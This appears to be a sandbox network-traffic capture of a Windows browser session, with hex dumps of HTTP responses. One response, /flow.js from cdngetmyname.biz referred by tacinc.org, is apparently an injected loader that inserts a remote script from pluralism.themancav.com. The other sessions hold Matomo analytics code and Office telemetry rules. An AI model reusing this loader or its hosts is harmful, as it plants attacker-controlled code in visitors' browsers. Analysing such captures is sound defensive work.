                                                                                                                                                                                                                              Data Ascii: J3ss$E_7VqM.?pmN;hsmHZ36yyL0n{|xPUxpV>9q&y,Hr%"7p75Z_"3C?e1Y&!w3^ArBDgnsc><dnlwlY bE@sp
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: f1 b2 9b ea 03 f6 3c d4 6d 35 79 58 b9 42 23 b0 fa dc f4 31 49 20 65 cc f7 33 b7 26 ee 6f d8 f6 a6 82 91 9d a1 68 2d ae 17 86 47 be 6b d3 85 7c d3 c0 1a 68 86 9d c8 14 de 4b 17 03 54 59 56 6d 64 53 57 54 4d 97 15 bf fb 7e c9 6c 4c 6a fe 2d 38 ca 92 e5 ae ea 33 14 bc 28 9b 14 a8 db 5b cb d6 50 89 37 85 4e 85 0e 25 87 63 5c 12 56 65 c4 74 8a 91 70 da 28 da c0 d5 f8 d0 d7 5f 66 2e 64 f1 a0 4f 92 2a b1 e5 0f 41 60 c5 86 ff f9 aa e5 f1 0f 21 e0 0f db 26 76 c7 8e bb 3f 2b b3 d4 ee 55 0d b7 5d 14 cc 3a a6 a6 d5 ba 24 d3 28 56 c7 ef b8 72 bf bf 91 33 86 d1 fa 50 94 ec 8d b9 d3 50 56 33 b7 b8 ea 95 93 bc e1 1c 65 9e 5c 97 42 22 2d 48 e2 db 6c cb 1d 77 b9 c1 af 99 41 f0 40 89 83 cd 28 bf df 6e b9 a4 62 e5 63 26 b1 3c 2f 81 55 8f e6 61 86 87 f9 f9 72 a6 45 67 2d fd
                                                                                                                                                                                                                              Data Ascii: <m5yXB#1I e3&oh-Gk|hKTYVmdSWTM~lLj-83([P7N%c\Vetp(_f.dO*A`!&v?+U]:$(Vr3PPV3e\B"-HlwA@(nbc&</UarEg-
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: f5 21 45 9b 95 ff 05 ed 77 bd ce 75 2e 92 03 d0 46 83 79 1f a9 db 82 25 ea c6 8f db b4 55 ce b4 a2 ed da e8 77 1f fc 5a ee 28 db 82 86 d5 8e 38 07 1d f4 85 59 99 9a 61 41 92 97 3f f2 a9 02 b1 2c a9 98 e2 1f 82 40 94 75 db e9 6c 15 df 43 ca d5 12 99 d8 2a 9a 03 14 0e cf 9f 59 5e 6d 85 8a d2 9c d4 4f af 8b d9 6c e6 f0 51 77 61 08 f8 df 25 f2 91 aa aa 75 5c 50 6c bf 02 f5 a7 bf 44 2a 98 47 73 a2 90 9a 03 e0 1c ec 5b 6f c6 97 5f 98 ae 3b eb 4a f8 12 0f 9e c9 a2 d9 41 b4 46 17 ff c0 90 6c 99 ac f7 6f b2 6d ff aa 85 fc 62 90 af c6 8f 19 46 e3 8b d3 a9 50 15 b3 7b bf ac 06 a3 0f 83 79 d9 f0 56 da d8 94 e6 59 5a ed a5 1b 0b 6b 93 5a 25 af f9 eb 96 42 46 95 ac 29 fd 51 8d 98 71 bf 6d 3b e7 23 72 61 48 cb 3b 15 b5 1b 4d bb 18 42 38 a5 eb d0 1b 0b b4 c2 17 65 fd b9
                                                                                                                                                                                                                              Data Ascii: !Ewu.Fy%UwZ(8YaA?,@ulC*Y^mOlQwa%u\PlD*Gs[o_;JAFlombFP{yVYZkZ%BF)Qqm;#raH;MB8e
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 0d 81 a8 3f a2 38 8e 72 bf ee 16 8b c0 46 40 a1 5e 11 ad 3b 79 a0 e9 b2 b8 d3 60 d4 c3 62 f4 43 10 63 cb bb 21 99 99 fe cb d3 ae 96 79 d5 f2 92 94 40 b3 c5 e7 9a 7a 13 3e 64 cb c7 bb 93 47 f1 13 32 9b b5 50 16 b3 19 1a b1 f4 64 33 fa 09 7d 05 05 df c8 7c cf 49 61 a8 8c 55 ad 6e ad 0e e9 f8 07 f1 3d 3d 79 f7 71 ba 9d 61 db 03 d5 5e 19 c6 f7 7a 1f c2 78 5e 5e 18 3f 97 9f 1b 81 1d f0 73 30 00 8f de cd 5c f3 23 9e df df 3f 6c 5f d4 97 9e 73 5a 9f 77 bf 5c 88 48 7c 4f 84 9f 2a 46 b8 a3 bc e4 c1 fc 7b ec 02 56 81 ba 1e f7 36 e0 5d 63 10 0b 89 b6 25 b5 37 6e de a8 cd 31 bc 85 7b 87 f9 2b 3f 9f 96 4e 4f 0b 91 f5 e4 8d 1d 75 1a 9f d2 6a b9 bf b8 75 1c 10 c2 a7 bf 81 da 56 8d 4e 1d 35 f5 ef 6f c6 0e 97 f6 7a 75 70 28 af b5 69 b0 fe e7 42 77 8d 67 ce 05 c2 ef cb 47
                                                                                                                                                                                                                              Data Ascii: ?8rF@^;y`bCc!y@z>dG2Pd3}|IaUn==yqa^zx^^?s0\#?l_sZw\H|O*F{V6]c%7n1{+?NOujuVN5ozup(iBwgG


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              59192.168.2.64978691.212.166.214431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC521OUTGET /flow.js HTTP/1.1
                                                                                                                                                                                                                              Host: cdngetmyname.biz
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC315INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Content-Length: 233
                                                                                                                                                                                                                              Last-Modified: Wed, 25 Sep 2024 11:25:19 GMT
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              ETag: "66f3f31f-e9"
                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC233INData Raw: 20 3b 28 66 75 6e 63 74 69 6f 6e 28 6c 2c 68 2c 6e 2c 67 2c 6f 29 7b 67 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 68 29 3b 6f 3d 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 68 29 5b 30 5d 3b 67 2e 61 73 79 6e 63 3d 31 3b 67 2e 73 72 63 3d 6e 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 67 2c 6f 29 3b 7d 29 28 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 70 6c 75 72 61 6c 69 73 6d 2e 74 68 65 6d 61 6e 63 61 76 2e 63 6f 6d 2f 30 4d 2f 6d 72 61 76 74 68 63 53 30 37 64 79 66 35 76 76 4b 6a 36 4c 74 33 49 2b 39 75 70 44 47 76 37 71 53 7a 37 6d 71 69 64 65 2f 6f 5a 2b 50 72 51 3d 3d 27 29 3b
                                                                                                                                                                                                                              Data Ascii: ;(function(l,h,n,g,o){g=l.createElement(h);o=l.getElementsByTagName(h)[0];g.async=1;g.src=n;o.parentNode.insertBefore(g,o);})(document,'script','https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==');


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              60192.168.2.649787169.150.247.384431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC527OUTGET /analytics.js HTTP/1.1
                                                                                                                                                                                                                              Host: stats.wpmucdn.com
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Content-Length: 70428
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Server: BunnyCDN-DE1-1081
                                                                                                                                                                                                                              CDN-PullZone: 1121147
                                                                                                                                                                                                                              CDN-Uid: 778bbc1f-fc99-4e43-843d-a54ddaa69624
                                                                                                                                                                                                                              CDN-RequestCountryCode: US
                                                                                                                                                                                                                              Cache-Control: public, max-age=86400
                                                                                                                                                                                                                              ETag: "65e9b379-1131c"
                                                                                                                                                                                                                              Last-Modified: Thu, 07 Mar 2024 12:30:49 GMT
                                                                                                                                                                                                                              CDN-ProxyVer: 1.04
                                                                                                                                                                                                                              CDN-RequestPullSuccess: True
                                                                                                                                                                                                                              CDN-RequestPullCode: 200
                                                                                                                                                                                                                              CDN-CachedAt: 10/18/2024 21:38:21
                                                                                                                                                                                                                              CDN-EdgeStorageId: 1079
                                                                                                                                                                                                                              CDN-Status: 200
                                                                                                                                                                                                                              CDN-RequestTime: 0
                                                                                                                                                                                                                              CDN-RequestId: 1856884dd24afb48c227a33ac0cb63cc
                                                                                                                                                                                                                              CDN-Cache: HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC7240INData Raw: 2f 2a 21 21 0a 20 2a 20 50 69 77 69 6b 20 2d 20 66 72 65 65 2f 6c 69 62 72 65 20 61 6e 61 6c 79 74 69 63 73 20 70 6c 61 74 66 6f 72 6d 0a 20 2a 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 74 72 61 63 6b 69 6e 67 20 63 6c 69 65 6e 74 0a 20 2a 0a 20 2a 20 40 6c 69 6e 6b 20 68 74 74 70 73 3a 2f 2f 70 69 77 69 6b 2e 6f 72 67 0a 20 2a 20 40 73 6f 75 72 63 65 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 74 6f 6d 6f 2d 6f 72 67 2f 6d 61 74 6f 6d 6f 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 6a 73 2f 70 69 77 69 6b 2e 6a 73 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 68 74 74 70 73 3a 2f 2f 70 69 77 69 6b 2e 6f 72 67 2f 66 72 65 65 2d 73 6f 66 74 77 61 72 65 2f 62 73 64 2f 20 42 53 44 2d 33 20 43 6c 61 75 73 65 20 28 61 6c 73 6f 20 69 6e 20 6a 73 2f
                                                                                                                                                                                                                              Data Ascii: /*!! * Piwik - free/libre analytics platform * * JavaScript tracking client * * @link https://piwik.org * @source https://github.com/matomo-org/matomo/blob/master/js/piwik.js * @license https://piwik.org/free-software/bsd/ BSD-3 Clause (also in js/
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC7240INData Raw: 28 61 64 3c 33 32 29 7b 48 28 29 7d 65 6c 73 65 7b 69 66 28 61 64 3d 3d 39 32 29 7b 61 64 3d 61 68 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 47 29 3b 73 77 69 74 63 68 28 61 64 29 7b 63 61 73 65 20 39 32 3a 63 61 73 65 20 33 34 3a 63 61 73 65 20 34 37 3a 63 61 73 65 20 39 38 3a 63 61 73 65 20 31 31 36 3a 63 61 73 65 20 31 31 30 3a 63 61 73 65 20 31 30 32 3a 63 61 73 65 20 31 31 34 3a 61 67 2b 3d 6c 5b 61 64 5d 3b 47 2b 2b 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 31 37 3a 61 65 3d 2b 2b 47 3b 66 6f 72 28 61 63 3d 47 2b 34 3b 47 3c 61 63 3b 47 2b 2b 29 7b 61 64 3d 61 68 2e 63 68 61 72 43 6f 64 65 41 74 28 47 29 3b 69 66 28 21 28 61 64 3e 3d 34 38 26 26 61 64 3c 3d 35 37 7c 7c 61 64 3e 3d 39 37 26 26 61 64 3c 3d 31 30 32 7c 7c 61 64 3e 3d 36 35 26 26 61 64 3c
                                                                                                                                                                                                                              Data Ascii: (ad<32){H()}else{if(ad==92){ad=ah.charCodeAt(++G);switch(ad){case 92:case 34:case 47:case 98:case 116:case 110:case 102:case 114:ag+=l[ad];G++;break;case 117:ae=++G;for(ac=G+4;G<ac;G++){ad=ah.charCodeAt(G);if(!(ad>=48&&ad<=57||ad>=97&&ad<=102||ad>=65&&ad<
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC9328INData Raw: 22 2b 61 70 2b 22 3d 28 5b 5e 26 23 5d 2a 29 22 3b 76 61 72 20 61 74 3d 6e 65 77 20 52 65 67 45 78 70 28 61 6f 29 3b 76 61 72 20 61 72 3d 61 74 2e 65 78 65 63 28 61 71 29 3b 72 65 74 75 72 6e 20 61 72 3f 53 28 61 72 5b 31 5d 29 3a 22 22 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 6f 29 7b 69 66 28 61 6f 26 26 53 74 72 69 6e 67 28 61 6f 29 3d 3d 3d 61 6f 29 7b 72 65 74 75 72 6e 20 61 6f 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 2b 7c 5c 73 2b 24 2f 67 2c 22 22 29 7d 72 65 74 75 72 6e 20 61 6f 7d 66 75 6e 63 74 69 6f 6e 20 44 28 61 6f 29 7b 72 65 74 75 72 6e 20 75 6e 65 73 63 61 70 65 28 74 28 61 6f 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 6d 28 61 45 29 7b 76 61 72 20 61 71 3d 66 75 6e 63 74 69 6f 6e 28 61 4b 2c 61 4a 29 7b 72 65 74 75 72 6e 28 61 4b 3c 3c 61 4a 29
                                                                                                                                                                                                                              Data Ascii: "+ap+"=([^&#]*)";var at=new RegExp(ao);var ar=at.exec(aq);return ar?S(ar[1]):""}function a(ao){if(ao&&String(ao)===ao){return ao.replace(/^\s+|\s+$/g,"")}return ao}function D(ao){return unescape(t(ao))}function am(aE){var aq=function(aK,aJ){return(aK<<aJ)
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC7240INData Raw: 2e 66 69 6e 64 46 69 72 73 74 4e 6f 64 65 48 61 76 69 6e 67 41 74 74 72 69 62 75 74 65 57 69 74 68 56 61 6c 75 65 28 61 70 2c 74 68 69 73 2e 43 4f 4e 54 45 4e 54 5f 4e 41 4d 45 5f 41 54 54 52 29 3b 69 66 28 61 74 29 7b 72 65 74 75 72 6e 20 61 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 56 61 6c 75 65 46 72 6f 6d 4e 6f 64 65 28 61 74 2c 74 68 69 73 2e 43 4f 4e 54 45 4e 54 5f 4e 41 4d 45 5f 41 54 54 52 29 7d 76 61 72 20 61 6f 3d 74 68 69 73 2e 66 69 6e 64 43 6f 6e 74 65 6e 74 50 69 65 63 65 28 61 70 29 3b 69 66 28 61 6f 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 6d 6f 76 65 44 6f 6d 61 69 6e 49 66 49 73 49 6e 4c 69 6e 6b 28 61 6f 29 7d 69 66 28 61 65 2e 68 61 73 4e 6f 64 65 41 74 74 72 69 62 75 74 65 57 69 74 68 56 61 6c 75 65 28 61 70 2c 22 74 69 74 6c
                                                                                                                                                                                                                              Data Ascii: .findFirstNodeHavingAttributeWithValue(ap,this.CONTENT_NAME_ATTR);if(at){return ae.getAttributeValueFromNode(at,this.CONTENT_NAME_ATTR)}var ao=this.findContentPiece(ap);if(ao){return this.removeDomainIfIsInLink(ao)}if(ae.hasNodeAttributeWithValue(ap,"titl
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC8688INData Raw: 6e 22 2c 22 70 69 77 69 6b 5f 63 61 6d 70 61 69 67 6e 22 2c 22 75 74 6d 5f 63 61 6d 70 61 69 67 6e 22 2c 22 75 74 6d 5f 73 6f 75 72 63 65 22 2c 22 75 74 6d 5f 6d 65 64 69 75 6d 22 5d 2c 62 47 3d 5b 22 70 6b 5f 6b 77 64 22 2c 22 70 69 77 69 6b 5f 6b 77 64 22 2c 22 75 74 6d 5f 74 65 72 6d 22 5d 2c 62 6b 3d 22 5f 70 6b 5f 22 2c 61 76 3d 22 70 6b 5f 76 69 64 22 2c 61 30 3d 31 38 30 2c 63 5a 2c 62 70 2c 62 53 3d 66 61 6c 73 65 2c 62 6c 3d 66 61 6c 73 65 2c 63 52 2c 62 66 2c 62 76 2c 63 4b 3d 33 33 39 35 35 32 30 30 30 30 30 2c 63 70 3d 31 38 30 30 30 30 30 2c 63 37 3d 31 35 37 36 38 30 30 30 30 30 30 2c 61 33 3d 74 72 75 65 2c 63 6e 3d 30 2c 62 51 3d 66 61 6c 73 65 2c 61 52 3d 66 61 6c 73 65 2c 63 62 2c 62 57 3d 7b 7d 2c 63 6d 3d 7b 7d 2c 62 6d 3d 7b 7d 2c 62
                                                                                                                                                                                                                              Data Ascii: n","piwik_campaign","utm_campaign","utm_source","utm_medium"],bG=["pk_kwd","piwik_kwd","utm_term"],bk="_pk_",av="pk_vid",a0=180,cZ,bp,bS=false,bl=false,cR,bf,bv,cK=33955200000,cp=1800000,c7=15768000000,a3=true,cn=0,bQ=false,aR=false,cb,bW={},cm={},bm={},b
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC7696INData Raw: 69 66 28 21 62 36 29 7b 72 65 74 75 72 6e 7d 76 61 72 20 64 6e 3d 6e 65 77 20 44 61 74 65 28 29 2c 64 6d 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 64 6e 2e 67 65 74 54 69 6d 65 28 29 2f 31 30 30 30 29 3b 69 66 28 21 4a 28 64 6c 29 29 7b 64 6c 3d 61 5a 28 29 7d 76 61 72 20 64 70 3d 64 6c 2e 75 75 69 64 2b 22 2e 22 2b 64 6c 2e 63 72 65 61 74 65 54 73 2b 22 2e 22 2b 64 6c 2e 76 69 73 69 74 43 6f 75 6e 74 2b 22 2e 22 2b 64 6d 2b 22 2e 22 2b 64 6c 2e 6c 61 73 74 56 69 73 69 74 54 73 2b 22 2e 22 2b 64 6c 2e 6c 61 73 74 45 63 6f 6d 6d 65 72 63 65 4f 72 64 65 72 54 73 3b 0a 64 67 28 61 55 28 22 69 64 22 29 2c 64 70 2c 61 48 28 29 2c 62 70 2c 63 5a 2c 62 53 29 7d 66 75 6e 63 74 69 6f 6e 20 62 4d 28 29 7b 76 61 72 20 64 6c 3d 61 44 28 61 55 28 22 72 65 66 22 29 29 3b 69
                                                                                                                                                                                                                              Data Ascii: if(!b6){return}var dn=new Date(),dm=Math.round(dn.getTime()/1000);if(!J(dl)){dl=aZ()}var dp=dl.uuid+"."+dl.createTs+"."+dl.visitCount+"."+dm+"."+dl.lastVisitTs+"."+dl.lastEcommerceOrderTs;dg(aU("id"),dp,aH(),bp,cZ,bS)}function bM(){var dl=aD(aU("ref"));i
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC8688INData Raw: 2c 64 75 2c 64 72 29 3b 0a 76 2e 73 65 74 48 72 65 66 41 74 74 72 69 62 75 74 65 28 64 73 2c 64 6d 29 3b 72 65 74 75 72 6e 20 74 72 75 65 7d 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 66 75 6e 63 74 69 6f 6e 20 61 4e 28 64 6d 29 7b 69 66 28 21 64 6d 7c 7c 21 64 6d 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 7d 76 61 72 20 64 6c 3b 66 6f 72 28 64 6c 3d 30 3b 64 6c 3c 64 6d 2e 6c 65 6e 67 74 68 3b 64 6c 2b 2b 29 7b 62 45 28 64 6d 5b 64 6c 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 59 28 64 6c 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 64 6d 29 7b 69 66 28 21 64 6c 29 7b 72 65 74 75 72 6e 7d 76 61 72 20 64 71 3d 76 2e 66 69 6e 64 50 61 72 65 6e 74 43 6f 6e 74 65 6e 74 4e 6f 64 65 28 64 6c 29 3b 76 61 72 20 64 72 3b 69 66 28 64 6d 29 7b 64 72 3d 64 6d
                                                                                                                                                                                                                              Data Ascii: ,du,dr);v.setHrefAttribute(ds,dm);return true}return false}function aN(dm){if(!dm||!dm.length){return}var dl;for(dl=0;dl<dm.length;dl++){bE(dm[dl])}}function aY(dl){return function(dm){if(!dl){return}var dq=v.findParentContentNode(dl);var dr;if(dm){dr=dm
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC14308INData Raw: 2e 64 65 6c 65 74 65 43 75 73 74 6f 6d 56 61 72 69 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 64 6c 2c 64 6d 29 7b 69 66 28 74 68 69 73 2e 67 65 74 43 75 73 74 6f 6d 56 61 72 69 61 62 6c 65 28 64 6c 2c 64 6d 29 29 7b 74 68 69 73 2e 73 65 74 43 75 73 74 6f 6d 56 61 72 69 61 62 6c 65 28 64 6c 2c 22 22 2c 22 22 2c 64 6d 29 7d 7d 3b 74 68 69 73 2e 64 65 6c 65 74 65 43 75 73 74 6f 6d 56 61 72 69 61 62 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 64 6c 29 7b 69 66 28 64 6c 3d 3d 3d 22 70 61 67 65 22 7c 7c 64 6c 3d 3d 3d 33 29 7b 62 57 3d 7b 7d 7d 65 6c 73 65 7b 69 66 28 64 6c 3d 3d 3d 22 65 76 65 6e 74 22 29 7b 63 6d 3d 7b 7d 7d 65 6c 73 65 7b 69 66 28 64 6c 3d 3d 3d 22 76 69 73 69 74 22 7c 7c 64 6c 3d 3d 3d 32 29 7b 61 52 3d 7b 7d 7d 7d 7d 7d 3b 74 68 69 73 2e 73 74
                                                                                                                                                                                                                              Data Ascii: .deleteCustomVariable=function(dl,dm){if(this.getCustomVariable(dl,dm)){this.setCustomVariable(dl,"","",dm)}};this.deleteCustomVariables=function(dl){if(dl==="page"||dl===3){bW={}}else{if(dl==="event"){cm={}}else{if(dl==="visit"||dl===2){aR={}}}}};this.st


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              61192.168.2.64979113.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                              x-ms-request-id: 319a90d3-d01e-0066-4138-21ea17000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180406Z-r1755647c66j878m0wkraqty38000000072g000000005h71
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              62192.168.2.64978813.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 420
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                              x-ms-request-id: 9e0e1983-701e-003e-2856-2379b3000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180407Z-17fbfdc98bbwfg2nvhsr4h37pn000000069g000000000ft4
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
